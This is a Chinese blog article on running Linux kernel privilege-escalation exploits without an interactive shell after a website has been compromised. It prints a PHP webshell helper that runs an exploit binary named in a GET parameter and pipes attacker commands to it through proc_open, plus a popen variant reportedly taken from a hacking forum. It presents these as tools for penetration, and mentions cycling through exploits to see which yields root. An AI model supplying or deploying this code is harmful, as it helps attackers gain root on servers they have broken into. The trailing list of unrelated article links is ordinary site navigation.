Linux下非交互式提权详解
前言
之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell。而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功。因此,写了一个简单的工具。需要的朋友们可以参考学习。
方法如下
proce_open()
// path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18 // cmd是你需要执行的命令,例如:whoami if(isset($_GET['path']) && isset($_GET['cmd'])){ $path = $_GET['path']; $cmd = $_GET['cmd']; $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($path, $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); echo stream_get_contents($pipes[1]); echo stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); } }
代码很简单,不懂的可以看看PHP手册,popen()
在这里也可以实现相同的效果
另外,有了这个代码之后,我们以后提权是不是就可以直接把提权工具扔到服务器上面,然后PHP代码改一改,循环测试哪些提权工具是可用的了。
popen()
这是土司之前一个人发的,代码原封不动的放在了下面。稍微改一改就能达到上面一样的效果
$sucommand = "/tmp/2.6.18-2011"; $fp = popen($sucommand ,"w"); fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111"); pclose($fp);
(资源库 www.zyku.net)
上一篇:解决Linux中ROOT用户删除普通用户报普通用户已登录问题
栏 目:Linux
下一篇:apt-get指令的autoclean,clean,autoremove的区别
本文标题:Linux下非交互式提权详解
本文地址:https://www.zyku.net/linux/1263.html
您可能感兴趣的文章
- 04-06oppofindx3阻拦广告推销电话方法
- 04-24Python连接字符串(join %)
- 11-09vivox70pro调节视频美颜程度教程分享
- 06-15帝国CMS判断会员是否登录,后台管理员是
- 01-14加班小时工-加班小时工应用软件功能介
- 01-18小猪赚钱-小猪赚钱应用软件功能介绍
- 10-12realmegtneo2怎样开启暗色模式
- 10-14iPhone13如何与家人定位共享
- 12-23HTML <bdi> 标签
- 02-18红米k40游戏增强版录屏功能开启方法
- 01-11巧学错题本-巧学错题本应用软件功能介
- 04-21oppofindx3启用系统分身方法
- 01-11军队文职准题库-军队文职准题库应用软
- 01-11帕为-帕为应用软件功能介绍
- 12-31OPPO手机睡眠提醒关闭教程介绍
- 04-26yii2中dropDownList实现二级和三级联
- 10-22苹果13mini如何设置面容解锁
- 07-05Linux lprm命令
- 04-24Python交换变量
- 03-16帝国CMS内容页评论显示会员头像
最近更新
阅读排行
猜你喜欢
- 04-02iqooneo5护眼模式设置方法
- 11-24苹果13视图放大显示方法介绍
- 02-17华为手机杂志锁屏样式开启教程
- 02-09小米11手机时间显示24小时时间制方法
- 12-31相册恢复精灵-相册恢复精灵应用软件功
- 03-19荣耀60开启桌面一键锁屏方法
- 01-03小程序生命周期(onLaunch、onShow、on
- 01-27ios14关闭睡眠闹钟方法
- 01-19好心情影视app-好心情影视app应用软件
- 09-15抖音怎么关闭自动更新